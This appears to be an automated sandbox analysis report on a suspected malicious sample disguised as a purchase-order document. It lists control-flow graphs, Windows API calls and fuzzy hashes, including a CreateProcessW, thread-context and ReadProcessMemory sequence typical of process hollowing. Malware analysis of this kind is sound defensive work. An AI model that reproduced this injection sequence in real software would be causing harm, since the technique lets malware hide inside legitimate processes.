                                                                                    control_flow_graph 1740 f4bc00-f4bca0 call f4e070 * 3 1747 f4bcb7 1740->1747 1748 f4bca2-f4bcac 1740->1748 1749 f4bcbe-f4bcc7 1747->1749 1748->1747 1750 f4bcae-f4bcb5 1748->1750 1751 f4bcce-f4c380 1749->1751 1750->1749 1752 f4c382-f4c386 1751->1752 1753 f4c393-f4c3c0 CreateProcessW 1751->1753 1754 f4c3cc-f4c3f9 1752->1754 1755 f4c388-f4c38c 1752->1755 1761 f4c3c2-f4c3c5 1753->1761 1762 f4c3ca 1753->1762 1771 f4c403 1754->1771 1772 f4c3fb-f4c3fe 1754->1772 1756 f4c405-f4c432 1755->1756 1757 f4c38e 1755->1757 1760 f4c43c-f4c456 Wow64GetThreadContext 1756->1760 1782 f4c434-f4c437 1756->1782 1757->1760 1764 f4c45d-f4c478 ReadProcessMemory 1760->1764 1765 f4c458 1760->1765 1766 f4c7c1-f4c7c3 1761->1766 1762->1760 1768 f4c47f-f4c488 1764->1768 1769 f4c47a 1764->1769 1770 f4c76a-f4c76e 1765->1770 1774 f4c4b1-f4c4d0 call f4d6f0 1768->1774 1775 f4c48a-f4c499 1768->1775 1769->1770 1776 f4c770-f4c774 1770->1776 1777 f4c7bf 1770->1777 1771->1760 1772->1766 1789 f4c4d7-f4c4fa call f4d830 1774->1789 1790 f4c4d2 1774->1790 1775->1774 1778 f4c49b-f4c4aa call f4d640 1775->1778 1779 f4c776-f4c782 1776->1779 1780 f4c789-f4c78d 1776->1780 1777->1766 1778->1774 1793 f4c4ac 1778->1793 1779->1780 1784 f4c78f-f4c792 1780->1784 1785 f4c799-f4c79d 1780->1785 1782->1760 1782->1766 1784->1785 1791 f4c79f-f4c7a2 1785->1791 1792 f4c7a9-f4c7ad 1785->1792 1799 f4c544-f4c565 call f4d830 1789->1799 1800 f4c4fc-f4c503 1789->1800 1790->1770 1791->1792 1795 f4c7af-f4c7b5 call f4d640 1792->1795 1796 f4c7ba-f4c7bd 1792->1796 1793->1770 1795->1796 1796->1766 1806 f4c567 1799->1806 1807 f4c56c-f4c58a call f4e090 1799->1807 1802 f4c505-f4c536 call f4d830 1800->1802 1803 f4c53f 1800->1803 1810 f4c53d 1802->1810 1811 f4c538 1802->1811 1803->1770 1806->1770 1813 f4c595-f4c59f 1807->1813 1810->1799 1811->1770 1814 f4c5d5-f4c5d9 1813->1814 1815 f4c5a1-f4c5d3 call f4e090 1813->1815 1817 f4c6c4-f4c6e1 call f4d240 1814->1817 1818 f4c5df-f4c5ef 1814->1818 1815->1813 1826 f4c6e3 1817->1826 1827 f4c6e8-f4c707 Wow64SetThreadContext 1817->1827 1818->1817 1819 f4c5f5-f4c605 1818->1819 1819->1817 1822 f4c60b-f4c62f 1819->1822 1825 f4c632-f4c636 1822->1825 1825->1817 1828 f4c63c-f4c651 1825->1828 1826->1770 1829 f4c709 1827->1829 1830 f4c70b-f4c716 call f4d570 1827->1830 1832 f4c665-f4c669 1828->1832 1829->1770 1836 f4c718 1830->1836 1837 f4c71a-f4c71e 1830->1837 1834 f4c6a7-f4c6bf 1832->1834 1835 f4c66b-f4c677 1832->1835 1834->1825 1838 f4c6a5 1835->1838 1839 f4c679-f4c6a3 1835->1839 1836->1770 1840 f4c720-f4c723 1837->1840 1841 f4c72a-f4c72e 1837->1841 1838->1832 1839->1838 1840->1841 1843 f4c730-f4c733 1841->1843 1844 f4c73a-f4c73e 1841->1844 1843->1844 1845 f4c740-f4c743 1844->1845 1846 f4c74a-f4c74e 1844->1846 1845->1846 1847 f4c750-f4c756 call f4d640 1846->1847 1848 f4c75b-f4c764 1846->1848 1847->1848 1848->1751 1848->1770
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00F4C3BB
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F4C451
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F4C473
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 2438371351-0
                                                                                    • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                                    • Instruction ID: a9b2e13e8a006a14438c7037bef81b20c4f63a30b2894649381cc8bffd413b93
                                                                                    • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                                    • Instruction Fuzzy Hash: 1C621E30A14258DBEB24CFA4C850BEEB772EF58700F1091A9D50DEB390E7799E81DB59

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1850 143923-143939 1851 143a13-143a17 1850->1851 1852 14393f-143954 call 146270 1850->1852 1855 183393-1833a2 LoadStringW 1852->1855 1856 14395a-143976 call 146b57 1852->1856 1858 1833ad-1833b6 1855->1858 1862 1833c9-1833e5 call 146350 call 143fcf 1856->1862 1863 14397c-143980 1856->1863 1860 143994-143a0e call 162340 call 143a18 call 164983 Shell_NotifyIconW call 14988f 1858->1860 1861 1833bc-1833c4 call 14a8c7 1858->1861 1860->1851 1861->1860 1862->1860 1876 1833eb-183409 call 1433c6 call 143fcf call 1433c6 1862->1876 1863->1858 1867 143986-14398f call 146350 1863->1867 1867->1860 1876->1860
                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001833A2
                                                                                      • Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00143A04
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                                    • String ID: Line:
                                                                                    • API String ID: 2289894680-1585850449
                                                                                    • Opcode ID: 6126b27c6f66b2cd7249d2553ea3217cba9e35d059d9fbec744e21ead6e66d80
                                                                                    • Instruction ID: 81110704e350a6b4b1baeef3ac90c5834fc29471585895165c33ad2552354d52
                                                                                    • Opcode Fuzzy Hash: 6126b27c6f66b2cd7249d2553ea3217cba9e35d059d9fbec744e21ead6e66d80
                                                                                    • Instruction Fuzzy Hash: 0631D471408301AAD725EB20DC49BEBB7D8AF65714F10492AF5A9831E1DF709758C7C3
                                                                                    APIs
                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00182C8C
                                                                                      • Part of subcall function 00143AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00143A97,?,?,00142E7F,?,?,?,00000000), ref: 00143AC2
                                                                                      • Part of subcall function 00142DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00142DC4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                    • String ID: X$`e
                                                                                    • API String ID: 779396738-2317500276
                                                                                    • Opcode ID: 336dfa3ceb6bac2fd25ff9c912dda595ccffe57d0520d7dcbd20beab474e227b
                                                                                    • Instruction ID: 9da59205d3814f4b84aa35fe828db8ea1ee6616943ff8b0c8a7dfe2fb11d8cc6
                                                                                    • Opcode Fuzzy Hash: 336dfa3ceb6bac2fd25ff9c912dda595ccffe57d0520d7dcbd20beab474e227b
                                                                                    • Instruction Fuzzy Hash: 7121A571A102589FCB01EF94C849BEE7BFCAF59314F008059F505B7291DBB45A99CFA1
                                                                                    APIs
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00160668
                                                                                      • Part of subcall function 001632A4: RaiseException.KERNEL32(?,?,?,0016068A,?,00211444,?,?,?,?,?,?,0016068A,00141129,00208738,00141129), ref: 00163304
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00160685
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                    • String ID: Unknown exception
                                                                                    • API String ID: 3476068407-410509341
                                                                                    • Opcode ID: 0f0e28f3ec19ea913aeb42599915ae6c6c8ad24037aadb371343cf1bb2085d42
                                                                                    • Instruction ID: 2585f8eee538a08e19a4bd40b75c0c5592a7a4af6d6b1bc37809aded8bf6d051
                                                                                    • Opcode Fuzzy Hash: 0f0e28f3ec19ea913aeb42599915ae6c6c8ad24037aadb371343cf1bb2085d42
                                                                                    • Instruction Fuzzy Hash: FFF0C23490030DB7CB05BAA4DC46C9F7B7C5E14310B604539BD249A5D2EF71DA7AC581
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 001C82F5
                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 001C82FC
                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 001C84DD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 146820519-0
                                                                                    • Opcode ID: db867b5aeff880728867cbfc0f6aeedc3b46e758d521d1d27ed000ef0624d3e5
                                                                                    • Instruction ID: 2ae0f9d9357655028efddbd40659a56274d71d8126a0dd08beed543e1a0e1509
                                                                                    • Opcode Fuzzy Hash: db867b5aeff880728867cbfc0f6aeedc3b46e758d521d1d27ed000ef0624d3e5
                                                                                    • Instruction Fuzzy Hash: 12126A719083419FC714DF28C484B6ABBE5BF99318F04895DE8998B392DB31ED45CF92
                                                                                    APIs
                                                                                      • Part of subcall function 00141BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00141BF4
                                                                                      • Part of subcall function 00141BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00141BFC
                                                                                      • Part of subcall function 00141BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00141C07
                                                                                      • Part of subcall function 00141BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00141C12
                                                                                      • Part of subcall function 00141BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00141C1A
                                                                                      • Part of subcall function 00141BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00141C22
                                                                                      • Part of subcall function 00141B4A: RegisterWindowMessageW.USER32(00000004,?,001412C4), ref: 00141BA2
                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0014136A
                                                                                    • OleInitialize.OLE32 ref: 00141388
                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 001824AB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1986988660-0
                                                                                    • Opcode ID: aa9fb601d83b2a0b0d6b5c61aec9219ed926e77946ce6fab1254a9e2655c33e3
                                                                                    • Instruction ID: 7918de0e5dee6fd50aa8001c640f892856d01649ae258b52ffa407ad9ccc3375
                                                                                    • Opcode Fuzzy Hash: aa9fb601d83b2a0b0d6b5c61aec9219ed926e77946ce6fab1254a9e2655c33e3
                                                                                    • Instruction Fuzzy Hash: 1271CCB4912201AED788DF79B9496D57BE6FBB8344395C22AD20AC7371EF304461CF84
                                                                                    APIs
                                                                                    • CloseHandle.KERNELBASE(00000000,00000000,?,?,001785CC,?,00208CC8,0000000C), ref: 00178704
                                                                                    • GetLastError.KERNEL32(?,001785CC,?,00208CC8,0000000C), ref: 0017870E
                                                                                    • __dosmaperr.LIBCMT ref: 00178739
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                    • String ID:
                                                                                    • API String ID: 2583163307-0
                                                                                    • Opcode ID: 4ec592fc25d98bbefa69ffd4faf057bd59d02dc65a4e8f4f3b891256e0737c7f
                                                                                    • Instruction ID: 4bbf35634205e431151b91b1eb9d6a99bedba808aeaf31efbf71d60c225a6e22
                                                                                    • Opcode Fuzzy Hash: 4ec592fc25d98bbefa69ffd4faf057bd59d02dc65a4e8f4f3b891256e0737c7f
                                                                                    • Instruction Fuzzy Hash: C3010432E4562036D6286234A84EB6E677B5BA2774F39C119F81C8B1E2DFF09CC18190
                                                                                    APIs
                                                                                    • __Init_thread_footer.LIBCMT ref: 001517F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footer
                                                                                    • String ID: CALL
                                                                                    • API String ID: 1385522511-4196123274
                                                                                    • Opcode ID: 95d7b3225ccfc13bb5b6cb8dd4037ab550517f8abea170eef026a86faffbf618
                                                                                    • Instruction ID: d48d9ec6863c544d75128a64984a79e5ee85a17114b60794709e7c9a6a64b0b9
                                                                                    • Opcode Fuzzy Hash: 95d7b3225ccfc13bb5b6cb8dd4037ab550517f8abea170eef026a86faffbf618
                                                                                    • Instruction Fuzzy Hash: D0229B70608201EFCB15DF14C480B2ABBF1BF99315F15891DF8AA8B3A1D771E949CB92
                                                                                    APIs
                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00143908
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_
                                                                                    • String ID:
                                                                                    • API String ID: 1144537725-0
                                                                                    • Opcode ID: aab16b3b30b57e62e47cb3bb349f9861b6bcf864598d8bf45c06c8c784d49e88
                                                                                    • Instruction ID: 9411a5b253101be341d46321de6befe05518de3dd0355abdef6061c2b6f043d7
                                                                                    • Opcode Fuzzy Hash: aab16b3b30b57e62e47cb3bb349f9861b6bcf864598d8bf45c06c8c784d49e88
                                                                                    • Instruction Fuzzy Hash: 2031A2B05057019FD720DF24D8857D7FBE8FB59708F00096EFAA983250EB71AA54CB92
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0014949C,?,00008000), ref: 00145773
                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0014949C,?,00008000), ref: 00184052
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 22bfc5d6d9d4e97b41686ce45746c7a5cb7717782aa2cfaec57f5e9ef528a84e
                                                                                    • Instruction ID: 1c6ebcf31b88a618bc1d95a1a9ac1e38c184166f4b30a8cfde579b30e19b600b
                                                                                    • Opcode Fuzzy Hash: 22bfc5d6d9d4e97b41686ce45746c7a5cb7717782aa2cfaec57f5e9ef528a84e
                                                                                    • Instruction Fuzzy Hash: 65014C31245225B7E3315A2ADC0EF977F99EF027B1F158211BAAC6A1E1CBB45894CB90
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00F4C3BB
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F4C451
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F4C473
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160732922.0000000000F4A000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F4A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f4a000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 2438371351-0
                                                                                    • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                    • Instruction ID: cdb8adea10b39a39912c955c02daf67daa6cf9aa791a6699fa26dbc2269ab690
                                                                                    • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                    • Instruction Fuzzy Hash: 1B12CF24E14658C6EB24DF64D8507DEB232EF68300F10A4E9910DEB7A5E77A4F81CF5A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString
                                                                                    • String ID:
                                                                                    • API String ID: 2948472770-0
                                                                                    • Opcode ID: 6f29765511eac6b45b249131bcc45469aca5234017d90c8a7a75a8bba9262c1a
                                                                                    • Instruction ID: 12a92029ebb15bdbb63de2e8dcfbd053cbfd94393841aefb2e4ef2f178e533c4
                                                                                    • Opcode Fuzzy Hash: 6f29765511eac6b45b249131bcc45469aca5234017d90c8a7a75a8bba9262c1a
                                                                                    • Instruction Fuzzy Hash: 89D15B74A04209EFCB14DF98D881EADBBB5FF68310F15415AE915AB291EB70ED81CF90
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction ID: a8f6e7be758d27c7d486a8d94182f75aac87acbb571e27998b88723ad2c5d872
                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction Fuzzy Hash: D7310074A00109DBC718CF99D480969FBB2FB49302B6486B9E819CF656D731EDCADBC0
                                                                                    APIs
                                                                                      • Part of subcall function 00144E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00144EDD,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144E9C
                                                                                      • Part of subcall function 00144E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00144EAE
                                                                                      • Part of subcall function 00144E90: FreeLibrary.KERNEL32(00000000,?,?,00144EDD,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144EC0
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144EFD
                                                                                      • Part of subcall function 00144E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00183CDE,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144E62
                                                                                      • Part of subcall function 00144E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00144E74
                                                                                      • Part of subcall function 00144E59: FreeLibrary.KERNEL32(00000000,?,?,00183CDE,?,00211418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00144E87
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                    • String ID:
                                                                                    • API String ID: 2632591731-0
                                                                                    • Opcode ID: 2078805050c0e78f77aaf7426b0e072f1bfa5ee583f24d5ce6aaf659a201d639
                                                                                    • Instruction ID: a4aa1862ad92137c0a85e13f3992fee2b44a760dede1f04af7f7d0f325fea66c
                                                                                    • Opcode Fuzzy Hash: 2078805050c0e78f77aaf7426b0e072f1bfa5ee583f24d5ce6aaf659a201d639
                                                                                    • Instruction Fuzzy Hash: 4E11E332600205ABDF14BB64DC02FAD77A5AF60B10F10882EF542B61E1EF759A499B90
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
